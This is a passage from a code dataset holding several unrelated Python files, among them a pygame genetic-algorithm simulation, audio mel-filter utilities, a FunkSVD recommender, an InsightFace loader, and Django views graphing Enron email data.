dpg.add_checkbox(label=\"clipper\", callback=clipper_toggle, default_value=True)\n\n with dpg.table(header_row=False, tag=\"table_clip\", clipper=True):\n\n for i in range(5):\n dpg.add_table_column()\n\n for i in range(30000):\n with dpg.table_row():\n for j in range(5):\n dpg.add_text(f\"Row{i} Column{j}\")\n\ndpg.show_metrics()\n\ndpg.create_viewport(title='Custom Title', width=800, height=600)\ndpg.setup_dearpygui()\ndpg.show_viewport()\ndpg.start_dearpygui()\ndpg.destroy_context()\n","sub_path":"CS/Programming_Languages/Python/Modules/exterior/topics/gui/dearPyGUI/documentation/_24_tables/_24_9_clipping/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"383028975","text":"import pygame\nfrom Ship import Ship\nfrom Target import Target\nfrom Rectangle import Rectangle\nfrom colors import *\nimport random\nimport math\nimport time\n\npygame.init()\n\n\nscreen = pygame.display.set_mode([1000, 800])\ndone = False\nclock = pygame.time.Clock()\nrandom.seed()\n\nspeed_simulation = 5\n\niteration = 100\nduration = 5. 
/ speed_simulation\ngenome_size = 4\nsize_pop = 100\nsize_surviving_pop = size_pop // 2\n\nstate = 0\ntarget = Target(screen, 700, 500)\nrect1 = Rectangle(screen, 550, 350, 200, 20, -45)\nrect2 = Rectangle(screen, 350, 350, 200, 20, 45)\nrect3 = Rectangle(screen, 650, 450, 200, 20, -45)\nobstacles = [rect1, rect2]\nships = []\nspeed = 6\n\nmax_score_all_time = 0\n\n\ndef gen_ships():\n for k in range(0, size_pop):\n ship = Ship(screen)\n ship.genome = [(random.randrange(2*speed_simulation, 8*speed_simulation),\n random.randrange(-180, 180))] +\\\n [(random.randrange(2*speed_simulation, 8*speed_simulation),\n random.randrange(-160, 160))\n for i in range(genome_size-1)]\n ship.setSpeed(ship.genome[0][0], ship.genome[0][1])\n ship.setObstacles(obstacles)\n ships.append(ship)\n return ships\n\n\ndef select_ships():\n ships.sort(key=lambda s: s.score, reverse=True)\n return ships[:size_surviving_pop]\n\n\ndef mutations():\n for i, ship in enumerate(ships):\n ships[i].genome = [(g[0] + ((j+1*genome_size)/(2*genome_size))*(random.randrange(0, 100)/100. 
- 0.5)/speed_simulation*(1+ships[i].score**2+0.4*ships[i].score**3),\n g[1] + ((j+1*genome_size)/(2*genome_size))*(random.randrange(-10, 10))/(0.5+ships[i].score**2+ships[i].score**3))\n for j, g in enumerate(ships[i].genome)]\n return ships\n\n\ndef duplicate():\n for k in range(size_pop - size_surviving_pop):\n ship = Ship(screen)\n ship.copy(ships[k % size_surviving_pop])\n ships.append(ship)\n return ships\n\n\ndef reinit():\n for ship in ships:\n ship.init_position()\n return ships\n\n\ndef draw():\n for ship in ships:\n ship.draw()\n\n\ndef setSpeed(state):\n for ship in ships:\n ship.setSpeed(ship.genome[min(state, len(ship.genome)-1)][0], ship.genome[min(state, len(ship.genome)-1)][1])\n\n\ndef move():\n for ship in ships:\n ship.move()\n\n\ndef score(max_score_all_time):\n for ship in ships:\n ship.scoring(target)\n max_score = max(ship.score for ship in ships)\n if max_score > max_score_all_time:\n max_score_all_time = max_score\n for ship in ships:\n ship.score /= max_score\n return max_score_all_time\n\n\ndef all_ships_out():\n all_out = True\n for ship in ships:\n if ship.vx != 0 or ship.vy != 0:\n all_out = False\n return all_out\n\n\nships = gen_ships()\nt = time.clock()\nwhile not done:\n clock.tick(60)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n screen.fill(WHITE)\n for obst in obstacles:\n obst.draw()\n target.draw()\n draw()\n move()\n pygame.display.flip()\n if (time.clock() -t > state*duration/(genome_size+1)):\n setSpeed(state)\n state += 1\n\n if (all_ships_out() or time.clock() - t > duration) and iteration > 0:\n iteration -= 1\n state = 0\n max_score_all_time = score(max_score_all_time)\n ships = select_ships()\n ships = duplicate()\n ships = mutations()\n ships = reinit()\n setSpeed(0)\n t = time.clock()\n # ships = 
gen_ships()\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"79371473","text":"import os\n\n#Parameters:\nks = ['4', '5', '6', '7', 'all']\nks = ['all']\nCs = ['1', '0.1', '2']\n#Cs = ['1', '10']\nkernels = ['rbf', 'sigmoid']\n#kernels = ['sigmoid']\ngammas = ['0.0', '1', '10']\n\ntrainset = '../../corpora/cwi_paetzold_training'\ntestset = '../../corpora/cwi_paetzold_testing'\nfor C in Cs:\n\tfor kernel in kernels:\n\t\tfor g in gammas:\n\t\t\tfor k in ks:\n\t\t\t\toutput = '../../labels/shardlow/labels_Shardlow_'+C+'_'+kernel+'_'+g+'_'+k\n\t\t\t\tcomm = 'nohup python Run_Shardlow.py '+trainset+' '+k+' '+C+' '+kernel+' 3 '+g+' 0.0 '+testset+' '+output+' &'\n\t\t\t\tos.system(comm)\n","sub_path":"cwi_separated_classes/scripts/identifiers/Run_All_Shardlow.py","file_name":"Run_All_Shardlow.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"245557223","text":"from scipy import signal\nimport scipy\nimport numpy as np\n\nNPERSEG = 1024 * 2\nL = 60\nNFFT = NPERSEG\n\n\ndef getTFFT(length, nperseg=NPERSEG):\n r = 1.0 / 8\n return (length - int(r * nperseg)) // (int(7 * r * nperseg))\n\n\ndef sp3(x, nfft=NFFT, nperseg=NPERSEG):\n Fs = 44100\n _, _, f = signal.spectrogram(x[:, 0], Fs, nfft=nfft, nperseg=nperseg)\n return f\n\n\ndef psp3(f):\n\n y = np.log10(f + 1)\n return y * 5e4\n\n y = 10 * np.log10(f + 1e-30) # 1e-10\n return y / 200.0 * 3 + 1.7 # ????????\n\n\ndef hz2mel(hz):\n \"\"\"Convert a value in Hertz to Mels\n :param hz: a value in Hz. This can also be a numpy array, conversion proceeds element-wise.\n :returns: a value in Mels. 
If an array was passed in, an identical sized array is returned.\n \"\"\"\n return 2595 * np.log10(1 + hz / 700.0)\n\n\ndef mel2hz(mel):\n \"\"\"Convert a value in Mels to Hertz\n :param mel: a value in Mels. This can also be a numpy array, conversion proceeds element-wise.\n :returns: a value in Hertz. If an array was passed in, an identical sized array is returned.\n \"\"\"\n return 700 * (10 ** (mel / 2595.0) - 1)\n\n\ndef get_filterbanks(nfilt=20, nfft=512, samplerate=16000, lowfreq=0, highfreq=None):\n \"\"\"Compute a Mel-filterbank. The filters are stored in the rows, the columns correspond\n to fft bins. The filters are returned as an array of size nfilt * (nfft/2 + 1)\n :param nfilt: the number of filters in the filterbank, default 20.\n :param nfft: the FFT size. Default is 512.\n :param samplerate: the samplerate of the signal we are working with. Affects mel spacing.\n :param lowfreq: lowest band edge of mel filters, default 0 Hz\n :param highfreq: highest band edge of mel filters, default samplerate/2\n :returns: A numpy array of size nfilt * (nfft/2 + 1) containing filterbank. 
Each row holds 1 filter.\n \"\"\"\n highfreq = highfreq or samplerate / 2\n assert highfreq <= samplerate / 2, \"highfreq is greater than samplerate/2\"\n\n lowmel = hz2mel(lowfreq)\n highmel = hz2mel(highfreq)\n melpoints = np.linspace(lowmel, highmel, nfilt + 2)\n bin = np.floor((nfft + 1) * mel2hz(melpoints) / samplerate)\n\n fbank = np.zeros([nfilt, nfft // 2])\n for j in range(0, nfilt):\n for i in range(int(bin[j]), int(bin[j + 1])):\n fbank[j, i] = (i - bin[j]) / (bin[j + 1] - bin[j])\n for i in range(int(bin[j + 1]), int(bin[j + 2])):\n fbank[j, i] = (bin[j + 2] - i) / (bin[j + 2] - bin[j + 1])\n return fbank\n\n\ndef create_mel_filter(\n fft_size, n_freq_components=64, start_freq=100 - 80, end_freq=1000 * 5, samplerate=44100\n):\n \"\"\"\n Creates a filter to convolve with the spectrogram to get out mels\n\n \"\"\"\n mel_inversion_filter = get_filterbanks(\n nfilt=n_freq_components,\n nfft=fft_size,\n samplerate=samplerate,\n lowfreq=start_freq,\n highfreq=end_freq,\n )\n mel_filter = mel_inversion_filter.T / mel_inversion_filter.sum(axis=1)\n\n return mel_filter, mel_inversion_filter\n\n\ndef make_mel(spectrogram, mel_filter, shorten_factor=1):\n mel_spec = np.transpose(mel_filter).dot(np.transpose(spectrogram))\n return mel_spec\n\n\nmel_filter, _ = create_mel_filter(NFFT, n_freq_components=L)\n\n\ndef shrink(magnitude, S):\n xi = np.linspace(0, magnitude.shape[0] - 1, S)\n magnitude = np.interp(xi, np.arange(magnitude.shape[0]), magnitude)\n return magnitude\n\n\ndef shrinkMel(x, mel_filter=mel_filter):\n mel = make_mel(x[1:].T, mel_filter)\n mel[np.isnan(mel)] = 0\n return mel\n\n\nclass AA(object):\n def __init__(self, nfft=NFFT, nperseg=NPERSEG):\n self.mel_filter = mel_filter\n self.nfft = nfft\n self.nperseg = nperseg\n\n def shrinkMel(self, x):\n if self.mel_filter.shape[0] != self.nperseg:\n mel_filter, _ = create_mel_filter(self.nfft, n_freq_components=L)\n return shrinkMel(x, mel_filter=mel_filter)\n\n def getTFFT(self, length):\n 
print(self.nperseg)\n return getTFFT(length, self.nperseg)\n\n def sp3(self, x):\n return sp3(x, nfft=self.nfft, nperseg=self.nperseg)\n","sub_path":"ailive/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"117273911","text":"#!/usr/bin/env python\nfrom __future__ import print_function, absolute_import\n\nimport logging\nimport logging.handlers\n\nimport os\nimport argparse\nimport sys\n\nimport pkg_resources\ntry:\n __version__ = pkg_resources.require(\"VermeerKAT\")[0].version\nexcept pkg_resources.DistributionNotFound:\n __version__ = \"dev\"\n\nPIPELINE_LOG = os.path.join(os.getcwd(), \"VermeerKAT.log\")\n\nclass DelayedFileHandler(logging.handlers.MemoryHandler):\n \"\"\"A DelayedFileHandler is a variation on the MemoryHandler. It will buffer up log\n entries until told to stop delaying, then dumps everything into the target file\n and from then on logs continuously. 
This allows the log file to be switched at startup.\"\"\"\n def __init__(self, filename, delay=True):\n logging.handlers.MemoryHandler.__init__(self, 100000, target=logging.FileHandler(filename))\n self._delay = delay\n\n def shouldFlush(self, record):\n return not self._delay\n\n def setFilename(self, filename, delay=False):\n self._delay = delay\n self.setTarget(logging.FileHandler(filename))\n if not delay:\n self.flush()\n\ndef create_logger():\n \"\"\" Create a console logger \"\"\"\n log = logging.getLogger(__name__)\n cfmt = logging.Formatter(\n ('%(name)s - %(asctime)s %(levelname)s - %(message)s'))\n log.setLevel(logging.DEBUG)\n\n filehandler = logging.FileHandler(PIPELINE_LOG)\n filehandler.setFormatter(cfmt)\n\n log.addHandler(filehandler)\n log.setLevel(logging.INFO)\n\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n console.setFormatter(cfmt)\n\n log.addHandler(console)\n return log, filehandler, console, cfmt\n\n# Create the log object\nlog, log_filehandler, log_console_handler, log_formatter = create_logger()\n\ndef remove_log_handler(hndl):\n log.removeHandler(hndl)\n\n\ndef add_log_handler(hndl):\n log.addHandler(hndl)\n\nNONCURSES = False","sub_path":"vermeerkat/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"50991425","text":"import numpy as np\nimport pickle as pkl\nimport bisect\n\n\ncwd = '/home/canbulguoglu/app'\n\n\nclass FunkSVD():\n def __init__(self, data):\n # Accepts pandas dataframe where column names are user_id, item_id and Rating\n with open(cwd+'/flask.p', 'rb') as f:\n myDicts = pkl.load(f)\n self.user_features = myDicts[0]\n self.item_features = myDicts[1]\n self.user_data = {}\n\n for each in data:\n if str(each['id']) in self.item_features:\n\n self.user_data[str(each['id'])] = float(each['rating'])/2\n\n def get_recommendation(self, howMany=20):\n\n user_predictions = 
self.__user_prediction_for_same_movies(\n self.user_data)\n # Find most most similar user_ids\n user_ids = FunkSVD.get_most_similar_users(\n self.user_data, user_predictions, 1)\n\n result_list = []\n # get user features for users who are most similar to given new user\n for user in user_ids:\n for item, item_feature in self.item_features.items():\n # predict ratings for most similar users\n prediction = np.dot(\n self.user_features[user], item_feature)\n bisect.insort(result_list, [prediction, item])\n\n return_list = []\n for pair in result_list:\n if len(return_list) >= 60:\n break\n if pair[1] in return_list:\n continue\n\n return_list.append(pair[1])\n np.random.shuffle(return_list)\n\n return return_list[:howMany]\n\n def __user_prediction_for_same_movies(self, user_ratings):\n result = {}\n for key in user_ratings:\n if key not in self.item_features:\n continue\n\n for user in self.user_features:\n result.setdefault(user, []).append(\n np.dot(self.user_features[user], self.item_features[key]))\n\n return result\n\n @staticmethod\n def mean_squared_difference(a, b):\n summation = 0\n n = len(a)\n for i in range(0, n):\n difference = a[i] - b[i]\n squared_difference = difference**2\n summation = summation + squared_difference\n MSE = summation/n\n\n return 1/MSE\n\n @staticmethod\n def get_most_similar_users(user_ratings, user_predictions, howMany):\n similarities = []\n\n for user, ratings in user_predictions.items():\n\n similarity = FunkSVD.mean_squared_difference(\n list(user_ratings.values()), ratings)\n\n similarities.append([user, similarity])\n\n similarities.sort(reverse=True, key=lambda x: x[1])\n\n return [each[0] for each in similarities[:howMany]]\n","sub_path":"new/app/funkrecommender.py","file_name":"funkrecommender.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"333444568","text":"import sqlite3\nconn = 
sqlite3.connect('test.db')\ncursor=conn.cursor()\n\n#sqlstr='insert into test values(1,\"helloworld\")'\n#cursor.execute(sqlstr)\nsqlstr='select * from test'\ndata=cursor.execute(sqlstr)\n#row=data.fetchone()\n#print(row)\nrows=data.fetchall()\nprint(rows)\n# for row in rows:\n# print(row)\nconn.commit()\nconn.close()\n","sub_path":"1.sqlite/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"278177041","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom scipy import misc\nimport sys\nimport os\nimport pickle\nimport argparse\n#import tensorflow as tf\nimport numpy as np\nimport mxnet as mx\nimport random\nimport cv2\nimport sklearn\nfrom sklearn.decomposition import PCA\nfrom time import sleep\nfrom easydict import EasyDict as edict\n# sys.path.append(os.path.join(os.path.dirname(__file__), 'src'))\nfrom mtcnn_detector import MtcnnDetector\nimport face_image\nimport face_preprocess\n\n\n\ndef do_flip(data):\n for idx in range(data.shape[0]):\n data[idx,:,:] = np.fliplr(data[idx,:,:])\n\ndef get_model(ctx, image_size, model_str, layer):\n _vec = model_str.split(',')\n assert len(_vec)==2\n prefix = _vec[0]\n epoch = int(_vec[1])\n print('---------*** Model loading ***-----------')\n # sym, arg_params, aux_params = mx.model.load_checkpoint(prefix, epoch)\n model_path=os.path.join(os.path.dirname(__file__), '..', 'model')\n # # transform model to npy\n print(model_path)\n with open(os.path.join(model_path,'sym.pkl'), 'rb') as a_: # open file with write-mode\n # picklestring = pickle.dump(sym, a_)\n sym=pickle.load(a_)\n with open(os.path.join(model_path,'arg_params.pkl'), 'rb') as b_: # open file with write-mode\n # picklestring = pickle.dump(arg_params, b_)\n arg_params=pickle.load(b_)\n with open(os.path.join(model_path,'aux_params.pkl'), 'rb') as c_: # open file with 
write-mode\n # picklestring = pickle.dump(aux_params, c_)\n aux_params=pickle.load(c_)\n #end\n\n all_layers = sym.get_internals()\n sym = all_layers[layer+'_output']\n # print('sym',type(sym))\n # print('arg_params',type(arg_params))\n # print('aux_params',type(aux_params))\n model = mx.mod.Module(symbol=sym, context=ctx, label_names = None)\n #model.bind(data_shapes=[('data', (args.batch_size, 3, image_size[0], image_size[1]))], label_shapes=[('softmax_label', (args.batch_size,))])\n # print(image_size[0])\n model.bind(data_shapes=[('data', (1, 3, image_size[0], image_size[1]))])\n # print(arg_params,aux_params)\n model.set_params(arg_params, aux_params)\n return model\n\nclass FaceModel:\n def __init__(self, args):\n self.args = args\n ctx = mx.gpu(args.gpu)\n _vec = args.image_size.split(',')\n assert len(_vec)==2\n image_size = (int(_vec[0]), int(_vec[1]))\n self.model = None\n self.ga_model = None\n if len(args.model)>0:\n self.model = get_model(ctx, image_size, args.model, 'fc1')\n if len(args.ga_model)>0:\n self.ga_model = get_model(ctx, image_size, args.ga_model, 'fc1')\n\n # self.threshold = args.threshold\n self.det_minsize = 50\n self.det_threshold = [0.6,0.7,0.8]\n #self.det_factor = 0.9\n self.image_size = image_size\n mtcnn_path = os.path.join(os.path.dirname(__file__), '..','mtcnn-model')\n if args.det==0:\n # detector = MtcnnDetector(model_folder=mtcnn_path, ctx=ctx, num_worker=1, accurate_landmark = True, threshold=self.det_threshold)\n with open(os.path.join(mtcnn_path,'mtcnn_0.pkl'), 'rb') as d_: # open file with write-mode\n # picklestring = pickle.dump(detector, d_)\n detector=pickle.load(d_)\n else:\n # detector = MtcnnDetector(model_folder=mtcnn_path, ctx=ctx, num_worker=1, accurate_landmark = True, threshold=[0.0,0.0,0.2])\n with open(os.path.join(mtcnn_path,'mtcnn_1.pkl'), 'rb') as e_: # open file with write-mode\n # picklestring = pickle.dump(detector, e_)\n detector=pickle.load(e_)\n self.detector = detector\n\n\n def get_input(self, 
face_img):\n ret = self.detector.detect_face(face_img, det_type = self.args.det)\n if ret is None:\n return None\n bbox, points = ret\n if bbox.shape[0]==0:\n return None\n bbox = bbox[0,0:4]\n points = points[0,:].reshape((2,5)).T\n # print('bbox',bbox)\n # print('points',points)\n nimg = face_preprocess.preprocess(face_img, bbox, points, image_size='112,112')\n nimg = cv2.cvtColor(nimg, cv2.COLOR_BGR2RGB)\n aligned = np.transpose(nimg, (2,0,1))\n return aligned\n\n def get_feature(self, aligned):\n input_blob = np.expand_dims(aligned, axis=0)\n data = mx.nd.array(input_blob)\n db = mx.io.DataBatch(data=(data,))\n self.model.forward(db, is_train=False)\n embedding = self.model.get_outputs()[0].asnumpy()\n embedding = sklearn.preprocessing.normalize(embedding).flatten()\n return embedding\n\n def get_ga(self, aligned):\n input_blob = np.expand_dims(aligned, axis=0)\n data = mx.nd.array(input_blob)\n db = mx.io.DataBatch(data=(data,))\n self.ga_model.forward(db, is_train=False)\n ret = self.ga_model.get_outputs()[0].asnumpy()\n g = ret[:,0:2].flatten()\n gender = np.argmax(g)\n a = ret[:,2:202].reshape( (100,2) )\n a = np.argmax(a, axis=1)\n age = int(sum(a))\n\n return gender, age\n\n","sub_path":"src/pickle_face_model.py","file_name":"pickle_face_model.py","file_ext":"py","file_size_in_byte":4888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"343883688","text":"from django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.contrib.sitemaps import views\nfrom django.views.generic import TemplateView\n\nfrom questions.views import QuestionFeedView, QuestionDetailView\nfrom questions.sitemaps import StaticViewSitemap, QuestionSitemap\n\n\nsitemaps = {\n 'static': StaticViewSitemap(),\n 'question': QuestionSitemap()\n}\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^comments/', 
# URL routing table.  NOTE(review): the named regex capture groups below
# ((?P<pk>...), (?P<section>...)) were missing from the stored source —
# "(?P\d+)" is not even a valid regex — most likely stripped during text
# extraction.  They are restored to the names the views expect:
# QuestionDetailView (a DetailView) looks up by ``pk`` and
# django.contrib.sitemaps.views.sitemap takes a ``section`` kwarg.
urlpatterns = [
    url(r'^admin/', include(admin.site.urls)),
    url(r'^comments/', include('django_comments.urls')),
    url('^', include('django.contrib.auth.urls')),
    url(r'^accounts/', include('accounts.urls')),
    url(r'^$', QuestionFeedView.as_view(), name='questions'),
    url(r'^question/(?P<pk>\d+)/$',
        QuestionDetailView.as_view(),
        name='detail_question'),
    url(r'^new/$', TemplateView.as_view(
        template_name="questions/new_question.html"),
        name='new_question'),
    url(r'^chat/$', TemplateView.as_view(
        template_name="questions/chat.html"),
        name='chat'),
    url(r'^telefon/$', TemplateView.as_view(
        template_name="questions/telefon.html"),
        name='telefon'),
    url(r'^forma/$', TemplateView.as_view(
        template_name="questions/forma_pr.html"),
        name='forma'),
    # Per-section sitemap plus the sitemap index.
    url(r'^sitemap-(?P<section>.+)\.xml$', views.sitemap, {'sitemaps': sitemaps},
        name='django.contrib.sitemaps.views.sitemap'),
    url(r'^sitemap\.xml$', views.index, {'sitemaps': sitemaps}),
    url(r'^robots.txt$', TemplateView.as_view(
        template_name='questions/robots.txt',
        content_type='text/plain'),)
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
# Linear-regression demo: fit y = a*x + b to noisy synthetic data and plot it.
import random
import matplotlib.pyplot as plt
import numpy as np
from sklearn import datasets, linear_model
from sklearn.metrics import mean_squared_error, r2_score
from matplotlib.font_manager import FontProperties

font = FontProperties(fname=r"c:\windows\fonts\msyh.ttc", size=15)

# Synthetic data: y is roughly 2*x with uniform noise in [-10, 10].
# (Renamed from `list`/`list2`, which shadowed the builtin `list`.)
xs = [[i] for i in range(60)]
ys = [[2 * i + random.randint(-10, 10)] for i in range(60)]

great = linear_model.LinearRegression()  # ordinary least-squares model
great.fit(xs, ys)  # fit() expects 2-D X and y

# Plot the data points and the fitted line.
plt.scatter(xs, ys)
plt.title("机器学习之:线性回归\n制作人:宋谨岑", fontproperties=font)

# BUG FIX: predict() requires a 2-D array ([[x]]); passing a bare scalar
# raises ValueError in scikit-learn >= 0.19.  The line's left endpoint is
# now predicted as well, instead of using the hard-coded constant
# 1.73825137 that only matched one particular random draw.
y_left = great.predict([[0]])[0][0]
y_right = great.predict([[60]])[0][0]
plt.plot([0, 60], [y_left, y_right], linewidth=3, color="black")
plt.show()

print(great.predict([[0]]))
print(great.predict([[60]]))
def filterDataByTime(request, data):
    """Return rows of ``data`` whose ``date`` lies in the requested
    [start_date, end_date] window (inclusive).

    Dates are compared lexicographically, which is correct for the ISO
    ``YYYY-MM-DD`` strings in the dataset; the defaults make the window
    unbounded when either end is missing from the request.
    """
    start_date = request.POST.get("start_date", '0000-00-00')
    end_date = request.POST.get("end_date", '9999-99-99')
    return data[(data["date"] >= start_date) & (data["date"] <= end_date)]


def filterDataByJobtitle(request, data):
    """Keep e-mails whose sender AND recipient job titles are both listed in
    the comma-separated ``job_titles`` request parameter; when the parameter
    is absent, no filtering is applied.
    """
    if 'job_titles' not in request.POST:
        return data
    wanted = set(request.POST.get("job_titles").split(','))
    # isin() replaces the original chain of `== title` masks that was seeded
    # with an always-false comparison against the sentinel '___'.
    return data[data["fromJobtitle"].isin(wanted) & data["toJobtitle"].isin(wanted)]


def filterDataBySentiment(request, data):
    """Keep rows matching any selected sentiment bucket:
    negative (<= -0.1), neutral (-0.1..0.1) or positive (>= 0.1).
    When no bucket is selected the data is returned unfiltered.
    """
    # All-False seed mask (the original used the always-false comparison
    # ``sentiment == 10`` for this purpose).  Debug prints removed.
    mask = pd.Series(False, index=data.index)
    filter_selected = False
    if 'sentiment_negative' in request.POST:
        mask |= data["sentiment"] <= -0.1
        filter_selected = True
    if 'sentiment_neutral' in request.POST:
        mask |= (data["sentiment"] >= -0.1) & (data["sentiment"] <= 0.1)
        filter_selected = True
    if 'sentiment_positive' in request.POST:
        mask |= data["sentiment"] >= 0.1
        filter_selected = True
    return data[mask] if filter_selected else data


def filterDataByPerson(request, data):  # used for other purposes, not necessarily in filtering
    """Keep rows in which the given person is either sender or recipient.

    BUG FIX: POST parameters arrive as strings while ``fromId``/``toId``
    hold numeric ids (cf. ``int(request.POST['person_id'])`` elsewhere in
    this module), so the original comparison never matched; the id is now
    coerced to int, falling back to the raw value when not numeric.
    """
    person_id = request.POST.get("personID")
    try:
        person_id = int(person_id)
    except (TypeError, ValueError):
        pass
    return data[(data["fromId"] == person_id) | (data["toId"] == person_id)]
def filterDataByEmailAddress(request, data):
    """Keep rows where the given e-mail address is sender or recipient."""
    email = request.POST.get("email")
    return data[(data["fromEmail"] == email) | (data["toEmail"] == email)]


def filter(request, data):  # full filtering; name kept for callers (it shadows the builtin)
    """Apply every selected filter (time window, job titles, sentiment) in
    sequence and return the filtered frame.  The commented-out duplicate
    version of this function was removed as dead code.
    """
    filtered = filterDataByTime(request, data)
    filtered = filterDataByJobtitle(request, filtered)
    filtered = filterDataBySentiment(request, filtered)
    return filtered


def index(request):
    """Serve the single-page front-end."""
    return render(request, 'index.html')


def makeGraph(request, df_enron):
    """Build the e-mail network as a bokeh plot and return it serialised
    with ``json_item`` (a JSON string consumed by the front-end).

    Nodes are people (ids), edges are e-mails; node size reflects degree
    and node colour reflects the sender's job title.  The large
    commented-out holoviews/datashader implementation that used to live at
    the bottom of this function was removed as dead code (see VCS history).
    """
    G = networkx.from_pandas_edgelist(df_enron, 'fromId', 'toId', edge_attr=True)

    # Numeric job-title codes drive the colour mapping (linear_cmap 1..10).
    job_codes = {'CEO': 1, 'Director': 2, 'Employee': 3, 'In House Lawyer': 4,
                 'Manager': 5, 'Managing Director': 6, 'President': 7,
                 'Trader': 8, 'Unknown': 9, 'Vice President': 10}
    df_rejob = df_enron.replace({"fromJobtitle": job_codes})
    df_attributes = df_enron[['fromId', 'fromJobtitle', 'fromEmail']].drop_duplicates()
    df_attributes.columns = ['fromId', 'job', 'fromEmail']
    df_attributesx = df_rejob[['fromId', 'fromJobtitle', 'fromEmail']].drop_duplicates()
    job = df_attributes.set_index('fromId').to_dict('i')
    jobx = df_attributesx.set_index('fromId').to_dict('i')
    fromEmail = df_attributes.set_index('fromEmail').to_dict('i')
    networkx.set_node_attributes(G, job)
    networkx.set_node_attributes(G, jobx)
    networkx.set_node_attributes(G, fromEmail)

    degrees = dict(networkx.degree(G))
    networkx.set_node_attributes(G, name='degree', values=degrees)
    # Shrink raw degree into a readable marker size (dict comprehension
    # replaces the original dict([...]) construction).
    adjusted_node_size = {node: (degree + 5) - ((degree + 5) * 0.3)
                          for node, degree in networkx.degree(G)}
    networkx.set_node_attributes(G, name='adjusted_node_size', values=adjusted_node_size)

    size_by_this_attribute = 'adjusted_node_size'
    color_by_this_attribute = 'fromJobtitle'

    color_palette = Category10[10]

    TOOLTIPS = [
        ("Person ID", "@index"),
        ("Email", "@fromEmail"),
        ("people communicated with", "@degree"),
        ("Jobtitle", "@job"),
    ]

    graph_size = int(request.POST.get('graph_size', '720'))
    plot = figure(tooltips=TOOLTIPS,
                  tools="pan,zoom_in,wheel_zoom,save,reset,box_select,undo",
                  active_scroll='wheel_zoom',
                  x_range=Range1d(-20, 20), y_range=Range1d(-20, 20),
                  title='Enron Emails',
                  plot_width=graph_size, plot_height=graph_size)
    plot.axis.visible = False

    N_graph = from_networkx(G, networkx.spring_layout, scale=100)

    N_graph.node_renderer.glyph = Circle(
        size=size_by_this_attribute,
        fill_color=linear_cmap(color_by_this_attribute, color_palette, 1, 10))
    N_graph.edge_renderer.glyph = MultiLine(line_alpha=10, line_width=1)

    plot.renderers.append(N_graph)

    return json.dumps(json_item(plot))
renderer.get_plot(T_graph)\n\n # return file_html(plot, CDN, \"Plot\")\n\ndef fullSizeGraph(request):\n \n graph_json = makeGraph(request, filter(request,pd.read_csv(request.FILES['csv_data'])))\n # return django.http.JsonResponse(graph_json, safe=False)\n return JsonResponse({\n 'graph': graph_json\n })\n\ndef initialFullSizeGraph(request):\n \n df_dataset = pd.read_csv(request.FILES['csv_data'])\n \n startDate = df_dataset[\"date\"].min()\n endDate = df_dataset[\"date\"].max()\n\n startYear = int(startDate[:4])\n endYear = int(endDate[:4])\n\n startMonth = int(startDate[5:7])\n endMonth = int(startDate[5:7])\n\n jobTitles = df_dataset.fromJobtitle.unique().tolist()\n\n graph_json = makeGraph(request, df_dataset)\n\n return JsonResponse({\n 'graph': graph_json,\n 'parameters': {\n 'timeSlider': {\n 'startYear': startYear,\n 'startMonth': startMonth,\n 'endYear': endYear,\n 'endMonth': endMonth\n },\n 'jobTitles': jobTitles\n }\n })\n\ndef chordDiagram(person_id, df_enron):\n import holoviews as hv\n from holoviews import opts\n from bokeh.resources import CDN\n from bokeh.embed import file_html\n\n hv.extension('bokeh')\n\n df_chord = df_enron.sort_values('fromJobtitle')\n df_chord['index'] = df_chord.index\n\n df_links = df_chord.groupby(['fromId', 'toId']).agg({'date':'count', 'sentiment':'mean'})\n df_links = df_links.reset_index()[['fromId','toId', 'date', 'sentiment']]\n df_links.columns = ['source', 'target', 'value', 'sentiment']\n\n x = df_chord[['fromId', 'fromJobtitle']].drop_duplicates()\n x.columns = ['source', 'fromJobtitle']\n\n df_links = pd.merge(df_links, x, on=\"source\")\n df_links.drop_duplicates(subset='source')\n\n df_nodes = df_chord[['fromId','fromEmail', 'fromJobtitle']].drop_duplicates().reset_index(drop=True)\n df_nodes.columns = ['index', 'name', 'group']\n df_nodes.sort_values('name')\n y = df_chord[['fromId', 'toId']].drop_duplicates().groupby(['fromId']).count().reset_index()\n y.columns = ['index', 'size']\n df_nodes = 
def chordDiagram(person_id, df_enron):
    """Build a holoviews chord diagram of one person's correspondence and
    return it serialised as a bokeh ``json_item`` JSON string.

    Edges aggregate e-mails per (sender, recipient) pair: ``value`` is the
    message count and ``sentiment`` the mean sentiment, which also drives
    the edge colour.  Only pairs with at least 5 messages are kept, and the
    diagram is finally restricted to edges touching ``person_id``.
    """
    # Heavy visualisation imports are kept local to this view.
    import holoviews as hv
    from holoviews import opts
    from bokeh.resources import CDN
    from bokeh.embed import file_html

    hv.extension('bokeh')

    df_chord = df_enron.sort_values('fromJobtitle')
    df_chord['index'] = df_chord.index

